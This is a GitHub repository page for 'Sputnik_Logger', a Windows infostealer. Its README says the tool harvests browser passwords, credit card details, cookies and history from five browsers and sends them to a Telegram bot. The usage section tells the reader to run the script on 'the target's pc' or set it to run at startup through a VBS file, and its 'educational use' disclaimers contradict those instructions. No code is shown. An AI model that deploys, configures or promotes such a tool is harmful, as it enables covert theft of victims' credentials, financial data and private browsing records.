Skip to content

Sputnik_Logger is an advanced data gathering tool designed for ethical and authorized use. It is capable of collecting sensitive information from various browsers and applications on a Windows system, such as login credentials, cookies, browser history, and more. This data is then securely transmitted via Telegram.

Notifications You must be signed in to change notification settings

MasterOfBrokenLogic/sputnikLogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Sputnik Key logger v2

Disclaimer

This script is designed to gather browser-related data, including login credentials, cookies, web history, and download information. It also includes functionality to send this data via Telegram for educational and research purposes only. Unauthorized use of this script may violate privacy laws. Ensure you have appropriate permissions before running this script.

Overview

This Python script collects various data from installed browsers on a Windows system and sends it via Telegram. It supports the following browsers:

  • Google Chrome
  • Microsoft Edge
  • Firefox
  • Brave
  • Opera

Features

  • Data Collection: Retrieves login credentials, credit card details, cookies, web history, and download information from supported browsers.
  • Encryption: Utilizes AES encryption for sensitive data.
  • Telegram Integration: Sends collected data securely via Telegram bot API.

Installation

  1. Clone the repository: git clone https://github.com/MasterOfBrokenLogic/sputnikLogger.git cd sputnikLogger

  2. Install dependencies: pip install -r requirements.txt

  3. Configure Telegram bot:

  • Obtain a Telegram Bot token from BotFather.
  • Replace TELEGRAM_TOKEN and TELEGRAM_CHAT_ID in the script with your bot token and chat ID.

Usage

  1. Run the script on the target's pc by using the command or create a vbs file that will run the script on the startup: sputnikLogger.py

  2. Monitor script output:

  • The script will collect data from installed browsers.
  • Data will be sent securely to Telegram if configured.

Security Considerations

  • Encryption: Uses AES encryption for secure data handling.
  • Token Security: Handle Telegram bot tokens securely to prevent unauthorized access.
  • Data Privacy: Respect user privacy and legal requirements when deploying this script.

Disclaimer

This script is for educational and research purposes only. Ensure compliance with local laws and obtain proper authorization before using it. The author assumes no liability for unauthorized or illegal use of this script.

About

Sputnik_Logger is an advanced data gathering tool designed for ethical and authorized use. It is capable of collecting sensitive information from various browsers and applications on a Windows system, such as login credentials, cookies, browser history, and more. This data is then securely transmitted via Telegram.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages